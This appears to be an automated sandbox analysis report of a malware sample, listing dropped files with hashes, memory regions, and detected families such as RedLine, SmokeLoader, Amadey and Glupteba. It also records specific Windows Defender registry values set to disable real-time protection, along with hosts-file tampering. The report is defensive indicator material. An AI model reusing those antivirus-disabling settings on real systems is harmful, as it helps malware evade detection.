C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3d4615d2c334e6104f67b5bd3c611ab9
SHA1 121eed7c62bfe1958480e0ddcc66124a636e098c
SHA256 43a244a379da9587a839ba8c71c0b487d1c89ce24254ea1e6d579efddb9fbb6d
SHA512 bbc4728c914b3dc8ee45cf79660f2621c6bbe42adeeb30d7d8d2476382894fb394db54bacacd10f74cae14d6b01253ae1c9a4c81f41adf4f5abb938c237cd037

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 26578a62eb71f8637105c0bf5571a3a1
SHA1 eb1b13d10aad3603ff37fab902247f6c01097f91
SHA256 383d58eb609dca3a3819d22439da2a50e2635a64db5c24834931381ae6df5a02
SHA512 aeeda20ce2e500ad17f23daccc1e396446476f6d51b679d49af8c92ef00c22ce7606b60848e128f13f5ba1581a8403f81169ac131cf302c856dffa170fca9e2e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7af89cbfc433f08fab307b2c07e47fe
SHA1 682d7efb8453bbe8a5b31d3f47c9021be2e5e9af
SHA256 8bdd6bf2c0f47b1be6e674ccbd73dd476fa1a37445b135077f19ec225ea03b87
SHA512 a7ff39eded1a49706c90169a642bc5a5567930c7e585da7efedaa3c5088f2a2b3315b6dd8ed38d3fd4c04c4903f7fca0ab2c131a04b1bd27b910ca3d0468b1d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 187deaabce830f0513783a8cb09059fe
SHA1 c16494ab0b4ff66ecad4874e9c759c358b5c7623
SHA256 d37521201499985e9d27e5281f7484edf4204545dba0f7ef505eee7fdb6479b5
SHA512 7267aeb8204788b9cb0f7794ad7de4445e59e386207dafe8007cac5838923d9400d138ef82bfc7c53e79cd39cd1ae37f8ccbf6f2740161c8fdd4d2f733d40986

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 862800b6435e5b90f17f7fb052c5bb40
SHA1 8ec9ffe3dff2a34f68857783d541b6e6c5a323fc
SHA256 770a9586747af6d09ad3dea70de8cb33f56b625e00ef7ee1635fc0ee16fb573e
SHA512 c7ffbfeade025bb95f5af68296117cb14200e2b85e9d1b2629705bb470f9f864a879c302bb0dee569ac320526cb26a41e0f8c4d9209b900ed75695f6ff7ae71f

memory/1620-904-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ABGWT92S\favicon[2].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

C:\Users\Admin\AppData\Local\Temp\A598.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\5h7y85m\imagestore.dat

MD5 ade9ae553b514222e1948c157d20d37c
SHA1 20af34c400cb980ec36cece9a1ed918c451a0756
SHA256 62c9ea86b881ec38aa7c8c43c8a8dd715b83a40d0aaf95dea78e4b6227afb44f
SHA512 86d68bd99b7cc109f4b5d60e20aa8fabb9292604a31be0f7ccedc9f697d6a029707bb7597e70ca0f5b9ad6eebadc67f7252d81e5aa92857719b71cbfac61b5b3

C:\Users\Admin\AppData\Local\Temp\A598.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

memory/1160-917-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/1160-918-0x00000000010B0000-0x0000000001FDA000-memory.dmp

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Temp\CE8C.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

memory/2552-954-0x00000000002E0000-0x000000000033A000-memory.dmp

memory/2100-953-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2100-957-0x0000000000AC0000-0x0000000000FD6000-memory.dmp

memory/2552-956-0x0000000000400000-0x000000000046F000-memory.dmp

memory/2212-952-0x0000000003F70000-0x0000000004368000-memory.dmp

memory/2212-965-0x0000000004370000-0x0000000004C5B000-memory.dmp

memory/1160-964-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2212-963-0x0000000003F70000-0x0000000004368000-memory.dmp

memory/2212-966-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D928.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/1620-975-0x000007FEF5750000-0x000007FEF613C000-memory.dmp

memory/1920-974-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1992-978-0x0000000000020000-0x000000000003E000-memory.dmp

memory/1992-979-0x0000000000400000-0x0000000000431000-memory.dmp

memory/1992-985-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2100-988-0x0000000005260000-0x00000000052A0000-memory.dmp

memory/1256-987-0x00000000002D0000-0x00000000002EE000-memory.dmp

memory/2100-989-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2100-991-0x00000000004A0000-0x00000000004A1000-memory.dmp

memory/1256-992-0x0000000004A10000-0x0000000004A50000-memory.dmp

memory/1256-990-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/2212-993-0x0000000004370000-0x0000000004C5B000-memory.dmp

memory/2212-994-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1920-997-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2212-995-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1204-996-0x0000000003B20000-0x0000000003B36000-memory.dmp

memory/888-1001-0x0000000004080000-0x0000000004478000-memory.dmp

memory/888-1002-0x0000000004080000-0x0000000004478000-memory.dmp

memory/1992-1003-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/888-1011-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1932-1054-0x000000013FCA0000-0x0000000140241000-memory.dmp

memory/2100-1055-0x0000000005260000-0x00000000052A0000-memory.dmp

memory/888-1052-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1256-1056-0x0000000070700000-0x0000000070DEE000-memory.dmp

memory/1876-1057-0x0000000003E90000-0x0000000004288000-memory.dmp

memory/1256-1063-0x0000000004A10000-0x0000000004A50000-memory.dmp

memory/1876-1062-0x0000000003E90000-0x0000000004288000-memory.dmp

memory/1876-1064-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1876-1070-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1876-1071-0x0000000003E90000-0x0000000004288000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1932-1091-0x000000013FCA0000-0x0000000140241000-memory.dmp

memory/2676-1099-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

memory/2676-1100-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2100-1101-0x00000000004C0000-0x00000000004DC000-memory.dmp

memory/2676-1102-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/1876-1104-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2676-1107-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/2676-1126-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/2676-1127-0x0000000002570000-0x00000000025F0000-memory.dmp

memory/2676-1128-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/2100-1129-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1130-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1150-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2676-1151-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

memory/2100-1153-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1155-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1157-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1161-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1159-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1163-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1165-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1172-0x0000000000500000-0x0000000000501000-memory.dmp

memory/2100-1171-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/1820-1195-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1194-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1196-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 11ab007cfbcacdc1c6d896e82bdfc4e9
SHA1 1ce1adb0df42f0b5db780e3024d6af4a543ff6df
SHA256 2ab5a85800926416dae456d85034f14f0f900ea57dad402b03dfaf5459456879
SHA512 2a0ba9f65c3c2a8724e7bafac754c4a0163c04bc3bd93837e092d4601a6d65a30b873410dfe09a53ca117cdec9b90fa3f6b594f6877ecb8102aab8e752df1642

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 04207c62088dc57591a21020c1fe9d0e
SHA1 b4035f465dd4ffe5a663ad1f15fb3d94d3ea4771
SHA256 d8c1d2ce9b5e251f5d82037668faeed5f4c4b097a70f0adde47bd05aadb1d399
SHA512 926b15c4488105a7259c4b29dbe686cc432d180172677c12062208a65ca6047f635209fd017583c14538e04306cd3df5eab6ce78fcf48e32ca62ce27d30dde85

memory/1820-1193-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1192-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1820-1182-0x0000000000400000-0x000000000047F000-memory.dmp

memory/2100-1169-0x00000000004C0000-0x00000000004D5000-memory.dmp

memory/2100-1167-0x00000000004C0000-0x00000000004D5000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 84b7b15f002b026f01764e4f79afb40a
SHA1 b7f02db7505eafaa9920a0ccee963751ff92061b
SHA256 94f90489e4b14e597e86ddafd8b154d5a3262ba93fff0ae50ab92acf3d46523d
SHA512 d202542d403ba038e520858d9014afcc0e8afd327e893624182ae191b579d87543e960083dee2522bb336e981abf86e2598602500f9460506da62d9b7d5fb388

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EVZ2FBHDFHJB4ZVEW430.temp

MD5 093bbb10d2357b79fca208f77c59c47d
SHA1 ba419cd0b96b7e1396653c16378071de9f2ea7d2
SHA256 d57302323fa9d001bf5688e22e45ab4f8af6ac85864c20c2cb05355f885c1bad
SHA512 bc3a50a76b2385859a8816f24e36936f5ca3b852c0dc152923f490191b47e3510b296b03a840289f9b1de30ec02e09560c79edc6310eb3564ccbfe70022353eb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 4df8c6ff3e7a04da12ad75fdf36bf309
SHA1 c93ae5e9f1519b2526c0dbfb861bde4bde08b10e
SHA256 b768fa1eb08331ad21ee462e133f7f0125b29808c0e82e9c64508dab60b35c8a
SHA512 be3971fe051642a1e086a1247c0eaec0af51a96d5255f1c5538c56ad957755fc58a19a97638cf34c49c34176af9c97c177d96fc6f0be441bf0c09e56f1722bac

memory/584-1307-0x0000000001F90000-0x0000000001F98000-memory.dmp

memory/584-1295-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8e7b4217fe77d362bb1522a55085f405
SHA1 72e3d4662ce53dca64c787a5d8e446eb0143a6a7
SHA256 1269b8a4d49358b6a40c77dd93a25c0701128da9a04750aecf535d0d774c370e
SHA512 b296c7aeb0e049fb2fdcb6cf72be6aa7eab416a0bd0b343f252d9db0ba4143be86d2672328194d3c0cceea41cd0e9c8bb44c03713fb13bd2f297e79c960f4ae6

memory/584-1317-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

memory/584-1349-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/584-1404-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

memory/584-1405-0x0000000002360000-0x00000000023E0000-memory.dmp

memory/584-1417-0x0000000002360000-0x00000000023E0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c219501c2f8db8db8980bda6eb471d71
SHA1 60cf2337b001c1c25943e6e1baab6213582276a7
SHA256 4335d3b0825ac0e753b27b5a871ece8b7ebcb4c307cf7aa9d076668fc68773e8
SHA512 f9237285ce0f62cb5af1bcee022c7029bf7ffe2798c522a941554e1bc0302076b01f39a71727850c88b199f9b9a9709bb38657c98896f9e2ccb8643ac7ca4a5b

C:\Users\Admin\AppData\Local\Temp\tmpA13F.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpA1B2.tmp

MD5 213238ebd4269260f49418ca8be3cd01
SHA1 f4516fb0d8b526dc11d68485d461ab9db6d65595
SHA256 3f8b0d150b1f09e01d194e83670a136959bed64a080f71849d2300c0bfa92e53
SHA512 5e639f00f3be46c439a8aaf80481420dbff46e5c85d103192be84763888fb7fcb6440b75149bf1114f85d4587100b9de5a37c222c21e5720bc03b708aa54c326

memory/584-1501-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

memory/2432-1542-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DV38LGVA\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2432-1565-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1256-1578-0x0000000070700000-0x0000000070DEE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 21:01

Reported

2023-10-10 21:50

Platform

win10v2004-20230915-en

Max time kernel

168s

Max time network

188s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8675.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\776F.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8F40.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CFF3.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\776F.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8675.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CFF3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3F0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4257.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\444C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bbtrhjj N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bvtrhjj N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Loads dropped DLL

Description Indicator Process Target
